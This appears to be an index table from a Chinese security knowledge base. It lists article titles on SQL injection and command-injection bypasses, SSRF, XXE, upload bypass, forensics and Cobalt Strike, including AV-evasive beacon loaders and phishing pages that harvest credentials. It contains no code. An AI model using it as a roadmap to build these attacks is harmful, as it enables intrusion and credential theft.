| 1505 | 安全技术  | SQL 注入                         | {'id': 6946, 'name': 'MySQL substring , substr, mid 函数较骚的使用方法（绕过逗号过滤的盲注思路）', 'pid': 361, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6946, 'title': None}                                          |
| 1506 | 安全技术  | SQL 注入                         | {'id': 6947, 'name': 'MySQL 布尔盲注-case-条件判断 + like函数', 'pid': 361, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6947, 'title': None}                                                                 |
| 1507 | 安全技术  | SQL 注入                         | {'id': 6948, 'name': 'MySQL 时间盲注-case-条件判断-sleep函数延时-过滤逗号绕过', 'pid': 361, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6948, 'title': None}                                                         |
| 1508 | 安全技术  | SQL 注入                         | {'id': 6949, 'name': 'MySQL 时间盲注-if-条件判断-sleep函数延时', 'pid': 361, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6949, 'title': None}                                                                  |
| 1509 | 安全技术  | SQL 注入                         | {'id': 6950, 'name': 'MySQL 布尔盲注-case-条件判断绕过括号过滤', 'pid': 361, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6950, 'title': None}                                                                    |
| 1510 | 安全技术  | SQL 注入                         | {'id': 6951, 'name': 'MySQL 报错注入方法与说明', 'pid': 362, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6951, 'title': None}                                                                               |
| 1511 | 安全技术  | SQL 注入                         | {'id': 6952, 'name': 'MySQL 报错注入之(floor报错注入)', 'pid': 362, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6952, 'title': None}                                                                        |
| 1512 | 安全技术  | SQL 注入                         | {'id': 6953, 'name': 'MySQL 报错注入之(updatexml报错注入)-(有长度限制,最长显示32位)', 'pid': 362, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6953, 'title': None}                                                    |
| 1513 | 安全技术  | SQL 注入                         | {'id': 6954, 'name': 'MySQL extractvalue与updatexml爆错注入突破长度限制的两种方法', 'pid': 362, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6954, 'title': None}                                                   |
| 1514 | 安全技术  | SQL 注入                         | {'id': 6955, 'name': 'MySQL 报错注入之(extractvalue报错注入)-(有长度限制,最长显示32位)', 'pid': 362, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6955, 'title': None}                                                 |
| 1515 | 安全技术  | SQL 注入                         | {'id': 6956, 'name': 'MySQL UNION 联合查询显注绕过逗号过滤', 'pid': 363, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6956, 'title': None}                                                                      |
| 1516 | 安全技术  | SQL 注入                         | {'id': 6957, 'name': 'MySQL UNION 联合注入-有显示位时使用', 'pid': 363, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6957, 'title': None}                                                                      |
| 1517 | 安全技术  | RMI反序列化                        | {'id': 7307, 'name': '探测利用开放的RMI服务', 'pid': 471, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7307, 'title': None}                                                                                  |
| 1518 | 安全技术  | RMI反序列化                        | {'id': 7308, 'name': '基于Object类型参数通过RMI客户端反序列化攻击服务端', 'pid': 471, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7308, 'title': None}                                                                 |
| 1519 | 安全技术  | RMI反序列化                        | {'id': 7309, 'name': '基于Object类型参数通过RMI客户端反序列化攻击服务端的绕过', 'pid': 471, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7309, 'title': None}                                                              |
| 1520 | 安全技术  | SSO                            | {'id': 7167, 'name': 'SSO 登陆劫持漏洞', 'pid': 425, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7167, 'title': None}                                                                                    |
| 1521 | 安全技术  | SSO                            | {'id': 7166, 'name': '利用不安全的JSONP绕过SSO实现账户接管', 'pid': 425, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7166, 'title': None}                                                                        |
| 1522 | 安全技术  | SSRF                           | {'id': 6313, 'name': 'gopher 协议介绍', 'pid': 216, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6313, 'title': None}                                                                                   |
| 1523 | 安全技术  | SSRF                           | {'id': 6314, 'name': '攻击内网主机', 'pid': 216, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6314, 'title': None}                                                                                        |
| 1524 | 安全技术  | SSRF                           | {'id': 6315, 'name': 'gopher 攻击内网redis', 'pid': 216, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6315, 'title': None}                                                                              |
| 1525 | 安全技术  | SSRF                           | {'id': 6316, 'name': 'gopher 攻击FastCGI', 'pid': 216, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6316, 'title': None}                                                                              |
| 1526 | 安全技术  | SSRF                           | {'id': 6317, 'name': 'gopher 攻击内网mysql', 'pid': 216, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6317, 'title': None}                                                                              |
| 1527 | 安全技术  | SSRF                           | {'id': 6311, 'name': 'file 协议读取本地文件', 'pid': 215, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6311, 'title': None}                                                                                 |
| 1528 | 安全技术  | SSRF                           | {'id': 6312, 'name': 'dict 协议探测端口', 'pid': 215, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6312, 'title': None}                                                                                   |
| 1529 | 安全技术  | SSRF                           | {'id': 6310, 'name': 'SSRF 简单介绍', 'pid': 214, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6310, 'title': None}                                                                                     |
| 1530 | 安全技术  | XXE                            | {'id': 6497, 'name': 'Blind XXE 利用', 'pid': 218, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6497, 'title': None}                                                                                  |
| 1531 | 安全技术  | XXE                            | {'id': 6326, 'name': 'Blind XXE 原理', 'pid': 218, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6326, 'title': None}                                                                                  |
| 1532 | 安全技术  | XXE                            | {'id': 6324, 'name': 'XXE漏洞代码示例', 'pid': 218, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6324, 'title': None}                                                                                     |
| 1533 | 安全技术  | XXE                            | {'id': 6325, 'name': 'Blind XXE 与 OOB-XXE', 'pid': 218, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6325, 'title': None}                                                                           |
| 1534 | 安全技术  | XXE                            | {'id': 6328, 'name': 'XXE 审计与利用思路', 'pid': 217, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6328, 'title': None}                                                                                   |
| 1535 | 安全技术  | XXE                            | {'id': 6329, 'name': 'XXE 防御', 'pid': 217, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6329, 'title': None}                                                                                        |
| 1536 | 安全技术  | XXE                            | {'id': 6323, 'name': 'XXE 审计函数', 'pid': 217, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6323, 'title': None}                                                                                      |
| 1537 | 安全技术  | XXE                            | {'id': 6327, 'name': 'XXEinjector 自动化XXE注射工具', 'pid': 217, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6327, 'title': None}                                                                        |
| 1538 | 安全技术  | XXE                            | {'id': 6318, 'name': 'XXE 简介', 'pid': 217, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6318, 'title': None}                                                                                        |
| 1539 | 安全技术  | XXE                            | {'id': 6319, 'name': 'XXE 相关基础概念', 'pid': 217, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6319, 'title': None}                                                                                    |
| 1540 | 安全技术  | XXE                            | {'id': 6320, 'name': 'XML外部实体的一些限制与解决办法', 'pid': 217, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6320, 'title': None}                                                                             |
| 1541 | 安全技术  | XXE                            | {'id': 6321, 'name': 'XXE 有回显利用方式总结', 'pid': 217, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6321, 'title': None}                                                                                 |
| 1542 | 安全技术  | XXE                            | {'id': 6322, 'name': 'XXE 无回显利用方式总结', 'pid': 217, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6322, 'title': None}                                                                                 |
| 1543 | 安全技术  | 系统命令执行bypass                   | {'id': 6741, 'name': '（一）符号与命令的关系', 'pid': 313, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6741, 'title': None}                                                                                   |
| 1544 | 安全技术  | 系统命令执行bypass                   | {'id': 6742, 'name': '（二）set命令和windows变量', 'pid': 313, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6742, 'title': None}                                                                            |
| 1545 | 安全技术  | 系统命令执行bypass                   | {'id': 6743, 'name': '（三）切割字符串', 'pid': 313, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6743, 'title': None}                                                                                      |
| 1546 | 安全技术  | 系统命令执行bypass                   | {'id': 6744, 'name': '（四）逻辑运算符在绕过中的作用', 'pid': 313, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6744, 'title': None}                                                                               |
| 1547 | 安全技术  | 系统命令执行bypass                   | {'id': 6745, 'name': '（五）利用For循环拼接命令', 'pid': 313, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6745, 'title': None}                                                                                |
| 1548 | 安全技术  | 系统命令执行bypass                   | {'id': 6754, 'name': '（六）目录穿越导致的命令执行', 'pid': 313, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6754, 'title': None}                                                                                |
| 1549 | 安全技术  | 系统命令执行bypass                   | {'id': 6746, 'name': '（一）linux下的符号和逻辑运算符', 'pid': 314, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6746, 'title': None}                                                                            |
| 1550 | 安全技术  | 系统命令执行bypass                   | {'id': 6747, 'name': '（二） 利用未被过滤命令绕过', 'pid': 314, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6747, 'title': None}                                                                                |
| 1551 | 安全技术  | 系统命令执行bypass                   | {'id': 6748, 'name': '（三）符号之间的组合', 'pid': 314, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6748, 'title': None}                                                                                    |
| 1552 | 安全技术  | 系统命令执行bypass                   | {'id': 6749, 'name': '（四）命令中的命令', 'pid': 314, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6749, 'title': None}                                                                                     |
| 1553 | 安全技术  | 系统命令执行bypass                   | {'id': 6750, 'name': '（五）利用linux中的环境变量', 'pid': 314, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6750, 'title': None}                                                                              |
| 1554 | 安全技术  | 系统命令执行bypass                   | {'id': 6751, 'name': '（六）使用大括号绕过空格过滤', 'pid': 314, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6751, 'title': None}                                                                                |
| 1555 | 安全技术  | 系统命令执行bypass                   | {'id': 6752, 'name': '（七）重定向符号绕过', 'pid': 314, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6752, 'title': None}                                                                                    |
| 1556 | 安全技术  | 系统命令执行bypass                   | {'id': 6753, 'name': '（八）Linux中特殊的base64编码', 'pid': 314, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6753, 'title': None}                                                                          |
| 1557 | 安全技术  | 上传绕过                           | {'id': 6330, 'name': '上传绕过总结', 'pid': 219, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6330, 'title': None}                                                                                        |
| 1558 | 安全技术  | 上传绕过                           | {'id': 6331, 'name': 'user.ini的利用', 'pid': 219, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6331, 'title': None}                                                                                   |
| 1559 | 安全技术  | 上传绕过                           | {'id': 6332, 'name': '条件竞争', 'pid': 219, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6332, 'title': None}                                                                                          |
| 1560 | 安全技术  | 电子取证                           | {'id': 6333, 'name': 'Audit Process Creation (592/4688)', 'pid': 222, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6333, 'title': None}                                                             |
| 1561 | 安全技术  | 电子取证                           | {'id': 6334, 'name': 'Program Inventory Event Log', 'pid': 222, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6334, 'title': None}                                                                   |
| 1562 | 安全技术  | 电子取证                           | {'id': 6335, 'name': 'Program-Telemetry Event Log', 'pid': 222, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6335, 'title': None}                                                                   |
| 1563 | 安全技术  | 电子取证                           | {'id': 6336, 'name': 'ShimCache (AppCompatCache)', 'pid': 223, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6336, 'title': None}                                                                    |
| 1564 | 安全技术  | 电子取证                           | {'id': 6337, 'name': 'UserAssist', 'pid': 223, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6337, 'title': None}                                                                                    |
| 1565 | 安全技术  | 电子取证                           | {'id': 6338, 'name': 'MUICache', 'pid': 223, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6338, 'title': None}                                                                                      |
| 1566 | 安全技术  | 电子取证                           | {'id': 6339, 'name': 'RunMRU', 'pid': 223, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6339, 'title': None}                                                                                        |
| 1567 | 安全技术  | 电子取证                           | {'id': 6340, 'name': 'AppCompatFlags Registry Keys', 'pid': 223, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6340, 'title': None}                                                                  |
| 1568 | 安全技术  | 电子取证                           | {'id': 6341, 'name': 'Background Activity Moderator (BAM)', 'pid': 223, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6341, 'title': None}                                                           |
| 1569 | 安全技术  | 电子取证                           | {'id': 6342, 'name': 'RecentApps', 'pid': 223, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6342, 'title': None}                                                                                    |
| 1570 | 安全技术  | 电子取证                           | {'id': 6343, 'name': 'Prefetch', 'pid': 224, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6343, 'title': None}                                                                                      |
| 1571 | 安全技术  | 电子取证                           | {'id': 6344, 'name': 'JumpLists', 'pid': 224, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6344, 'title': None}                                                                                     |
| 1572 | 安全技术  | 电子取证                           | {'id': 6345, 'name': 'Amcache / RecentFileCache.bcf', 'pid': 224, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6345, 'title': None}                                                                 |
| 1573 | 安全技术  | 电子取证                           | {'id': 6346, 'name': 'SRUM (System Resource Usage Monitor)', 'pid': 224, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6346, 'title': None}                                                          |
| 1574 | 安全技术  | 电子取证                           | {'id': 6347, 'name': 'win10时间轴', 'pid': 224, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6347, 'title': None}                                                                                      |
| 1575 | 安全技术  | 电子取证                           | {'id': 6348, 'name': '计划任务', 'pid': 225, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6348, 'title': None}                                                                                          |
| 1576 | 安全技术  | 电子取证                           | {'id': 6490, 'name': '获取sshd进程明文密码', 'pid': 265, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6490, 'title': None}                                                                                  |
| 1577 | 安全技术  | 电子取证                           | {'id': 6491, 'name': '获取sshd进程私钥', 'pid': 265, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6491, 'title': None}                                                                                    |
| 1578 | 安全技术  | 电子取证                           | {'id': 6492, 'name': '收集ssh登录凭证', 'pid': 266, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6492, 'title': None}                                                                                     |
| 1579 | 安全技术  | 电子取证                           | {'id': 6493, 'name': '收集su、sudo等需要提升权限运行的程序的登录凭证', 'pid': 266, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6493, 'title': None}                                                                    |
| 1580 | 安全技术  | 电子取证                           | {'id': 6489, 'name': 'strace简介', 'pid': 264, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6489, 'title': None}                                                                                      |
| 1581 | 安全技术  | 电子取证                           | {'id': 6349, 'name': 'Windows 端微信取证', 'pid': 226, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6349, 'title': None}                                                                                 |
| 1582 | 安全技术  | 电子取证                           | {'id': 6350, 'name': 'Android 端微信取证', 'pid': 226, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6350, 'title': None}                                                                                 |
| 1583 | 安全技术  | 电子取证                           | {'id': 6351, 'name': 'MAC OS 端微信取证', 'pid': 226, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6351, 'title': None}                                                                                  |
| 1584 | 安全技术  | 电子取证                           | {'id': 6352, 'name': 'IOS 端微信取证', 'pid': 226, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6352, 'title': None}                                                                                     |
| 1585 | 安全技术  | 常用命令                           | {'id': 6353, 'name': '基础网络命令', 'pid': 227, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6353, 'title': None}                                                                                        |
| 1586 | 安全技术  | 常用命令                           | {'id': 6354, 'name': '上路由常用命令', 'pid': 227, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6354, 'title': None}                                                                                       |
| 1587 | 安全技术  | 常用命令                           | {'id': 6355, 'name': '域操作命令', 'pid': 227, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6355, 'title': None}                                                                                         |
| 1588 | 安全技术  | 常用命令                           | {'id': 6356, 'name': 'Dos快捷命令', 'pid': 227, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6356, 'title': None}                                                                                       |
| 1589 | 安全技术  | 常用命令                           | {'id': 6357, 'name': 'Windows端口转发', 'pid': 227, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6357, 'title': None}                                                                                   |
| 1590 | 安全技术  | 常用命令                           | {'id': 6358, 'name': 'sql server常用操作远程桌面命令', 'pid': 227, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6358, 'title': None}                                                                          |
| 1591 | 安全技术  | 常用命令                           | {'id': 6359, 'name': 'msfvenom常用生成payload命令', 'pid': 227, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6359, 'title': None}                                                                         |
| 1592 | 安全技术  | 常用命令                           | {'id': 6360, 'name': 'Powershell基础命令', 'pid': 227, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6360, 'title': None}                                                                                |
| 1593 | 安全技术  | 常用命令                           | {'id': 6361, 'name': 'Powershell常用命令', 'pid': 227, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6361, 'title': None}                                                                                |
| 1594 | 安全技术  | 常用命令                           | {'id': 6362, 'name': 'Powershell注册表操作', 'pid': 227, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6362, 'title': None}                                                                               |
| 1595 | 安全技术  | 常用命令                           | {'id': 6363, 'name': 'Powershell操作注册表权限', 'pid': 227, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6363, 'title': None}                                                                             |
| 1596 | 安全技术  | 安全工具                           | {'id': 6364, 'name': 'Burpsuite 伪造ip爆破脚本', 'pid': 229, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6364, 'title': None}                                                                            |
| 1597 | 安全技术  | 安全工具                           | {'id': 6365, 'name': 'Burpsuite 自动化blind-xss插件', 'pid': 229, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6365, 'title': None}                                                                      |
| 1598 | 安全技术  | 安全工具                           | {'id': 6368, 'name': 'Cobalt Strike Beacon 基础信息搜集', 'pid': 232, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6368, 'title': None}                                                                   |
| 1599 | 安全技术  | 安全工具                           | {'id': 6369, 'name': 'Cobalt Strike Beacon 基础文件管理', 'pid': 232, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6369, 'title': None}                                                                   |
| 1600 | 安全技术  | 安全工具                           | {'id': 6370, 'name': 'Cobalt Strike Beacon 全部参数', 'pid': 232, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6370, 'title': None}                                                                     |
| 1601 | 安全技术  | 安全工具                           | {'id': 6371, 'name': 'Cobalt Strike 证书修改', 'pid': 232, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6371, 'title': None}                                                                            |
| 1602 | 安全技术  | 安全工具                           | {'id': 6366, 'name': 'Cobalt Strike 安装说明', 'pid': 231, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6366, 'title': None}                                                                            |
| 1603 | 安全技术  | 安全工具                           | {'id': 6367, 'name': 'Cobalt Strike 参数翻译', 'pid': 231, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6367, 'title': None}                                                                            |
| 1604 | 安全技术  | 安全工具                           | {'id': 6372, 'name': 'Cobalt Strike C2 Profile 简介', 'pid': 233, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6372, 'title': None}                                                                   |
| 1605 | 安全技术  | 安全工具                           | {'id': 6373, 'name': 'Cobalt Strike C2 Profile 原理', 'pid': 233, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6373, 'title': None}                                                                   |
| 1606 | 安全技术  | 安全工具                           | {'id': 6374, 'name': 'Cobalt Strike C2 Profile 用途', 'pid': 233, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6374, 'title': None}                                                                   |
| 1607 | 安全技术  | 安全工具                           | {'id': 6375, 'name': '尝试将 C2 隐匿于多级 nginx 反向代理', 'pid': 233, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6375, 'title': None}                                                                       |
| 1608 | 安全技术  | 安全工具                           | {'id': 6376, 'name': '尝试将本地 C2 隐匿于 SSH 加密隧道中', 'pid': 233, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6376, 'title': None}                                                                        |
| 1609 | 安全技术  | 安全工具                           | {'id': 6377, 'name': 'Cobalt Strike 监听器介绍', 'pid': 234, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6377, 'title': None}                                                                           |
| 1610 | 安全技术  | 安全工具                           | {'id': 6378, 'name': 'windows/beacon\_http/reverse\_http \[ 基于 http 协议的反向连接 ', 'pid': 234, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6378, 'title': None}                                        |
| 1611 | 安全技术  | 安全工具                           | {'id': 6379, 'name': 'windows/beacon\_https/reverse\_https \[ 基于 https 协议(加密)的反向连接 ', 'pid': 234, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6379, 'title': None}                                 |
| 1612 | 安全技术  | 安全工具                           | {'id': 6380, 'name': 'windows/foreign/reverse\_http \[ 反向 http 外部监听器 ', 'pid': 234, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6380, 'title': None}                                               |
| 1613 | 安全技术  | 安全工具                           | {'id': 6381, 'name': 'windows/foreign/reverse\_tcp \[ 反向 tcp 外部监听器 ', 'pid': 234, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6381, 'title': None}                                                 |
| 1614 | 安全技术  | 安全工具                           | {'id': 6382, 'name': 'windows/beacon\_smb/bind\_pipe \[ 一个专门为多层内网正向级联而设计的监听器 ', 'pid': 234, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6382, 'title': None}                                       |
| 1615 | 安全技术  | 安全工具                           | {'id': 6383, 'name': 'Cobalt Strike 获取凭据', 'pid': 235, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6383, 'title': None}                                                                            |
| 1616 | 安全技术  | 安全工具                           | {'id': 6384, 'name': 'Cobalt Strike psexec传递', 'pid': 235, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6384, 'title': None}                                                                        |
| 1617 | 安全技术  | 安全工具                           | {'id': 6385, 'name': 'Cobalt Strike Link Listener', 'pid': 235, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6385, 'title': None}                                                                   |
| 1618 | 安全技术  | 安全工具                           | {'id': 6386, 'name': 'Cobalt Strike ssh登录', 'pid': 235, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6386, 'title': None}                                                                           |
| 1619 | 安全技术  | 安全工具                           | {'id': 6388, 'name': '利用钓鱼页面来搜集目标各类 owa 入口账号密码', 'pid': 237, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6388, 'title': None}                                                                      |
| 1620 | 安全技术  | 安全工具                           | {'id': 6389, 'name': '利用钓鱼页面来搜集目标各类 vpn 入口账号密码', 'pid': 237, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6389, 'title': None}                                                                      |
| 1621 | 安全技术  | 安全工具                           | {'id': 6390, 'name': '利用钓鱼页面来搜集目标各类 oa 入口账号密码', 'pid': 237, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6390, 'title': None}                                                                       |
| 1622 | 安全技术  | 安全工具                           | {'id': 6391, 'name': 'Cobalt Strike 网页挂马', 'pid': 237, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6391, 'title': None}                                                                            |
| 1623 | 安全技术  | 安全工具                           | {'id': 6392, 'name': 'Cobalt Strike 批量发送钓鱼邮件', 'pid': 237, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6392, 'title': None}                                                                        |
| 1624 | 安全技术  | 安全工具                           | {'id': 6387, 'name': 'Cobalt Strike 探针', 'pid': 236, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6387, 'title': None}                                                                              |
| 1625 | 安全技术  | 安全工具                           | {'id': 6393, 'name': 'CobaltStrike beacon 免杀上线 \[ Csharp ', 'pid': 238, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6393, 'title': None}                                                           |
| 1626 | 安全技术  | 安全工具                           | {'id': 6394, 'name': 'CobaltStrike beacon 免杀上线 \[ Veil ', 'pid': 238, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6394, 'title': None}                                                             |
| 1627 | 安全技术  | 安全工具                           | {'id': 6395, 'name': 'Cobalt Strike beacon 免杀上线 \[ Powershell ', 'pid': 238, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6395, 'title': None}                                                      |
| 1628 | 安全技术  | 安全工具                           | {'id': 6396, 'name': 'Cobalt Strike beacon 免杀上线 \[ com 劫持 ', 'pid': 238, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6396, 'title': None}                                                          |
| 1629 | 安全技术  | 安全工具                           | {'id': 6397, 'name': 'Cobalt Strike beacon 免杀上线 \[ hanzoInjection ', 'pid': 238, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6397, 'title': None}                                                  |
| 1630 | 安全技术  | 安全工具                           | {'id': 6398, 'name': 'Cobalt Strike beacon 免杀上线 \[ 动态 shellcode 注入 ', 'pid': 238, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6398, 'title': None}                                                 |
| 1631 | 安全技术  | 安全工具                           | {'id': 6399, 'name': ' CobaltStrike与Metasploit实战联动', 'pid': 238, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6399, 'title': None}                                                                  |
| 1632 | 安全技术  | 安全工具                           | {'id': 7037, 'name': 'Cobalt Strike 思维脑图', 'pid': 379, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7037, 'title': None}                                                                            |
| 1633 | 安全技术  | 安全工具                           | {'id': 6839, 'name': 'Fofa 批量爬取数据脚本', 'pid': 339, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6839, 'title': None}                                                                                 |
| 1634 | 安全技术  | 安全工具                           | {'id': 6576, 'name': '基于 scanner/http/http\_version 发现HTTP服务', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6576, 'title': None}                                                        |
| 1635 | 安全技术  | 安全工具                           | {'id': 6577, 'name': '基于 scanner/smb/smb\_version 发现SMB服务', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6577, 'title': None}                                                           |
| 1636 | 安全技术  | 安全工具                           | {'id': 6578, 'name': '基于 scanner/ftp/ftp\_version 发现FTP服务', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6578, 'title': None}                                                           |
| 1637 | 安全技术  | 安全工具                           | {'id': 6579, 'name': '基于 scanner/discovery/arp\_sweep 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6579, 'title': None}                                                      |
| 1638 | 安全技术  | 安全工具                           | {'id': 6580, 'name': '基于 scanner/discovery/udp\_sweep 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6580, 'title': None}                                                      |
| 1639 | 安全技术  | 安全工具                           | {'id': 6581, 'name': '基于 auxiliary/scanner/ssh/ssh\_version 发现SSH服务', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6581, 'title': None}                                                 |
| 1640 | 安全技术  | 安全工具                           | {'id': 6582, 'name': '基于 auxiliary/scanner/telnet/telnet\_version 发现TELNET服务', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6582, 'title': None}                                        |
| 1641 | 安全技术  | 安全工具                           | {'id': 6583, 'name': '基于 scanner/discovery/udp\_probe 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6583, 'title': None}                                                      |
| 1642 | 安全技术  | 安全工具                           | {'id': 6584, 'name': '基于 auxiliary/scanner/dns/dns\_amp 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6584, 'title': None}                                                    |
| 1643 | 安全技术  | 安全工具                           | {'id': 6585, 'name': '基于 auxiliary/scanner/mysql/mysql\_version 发现mysql服务', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6585, 'title': None}                                           |
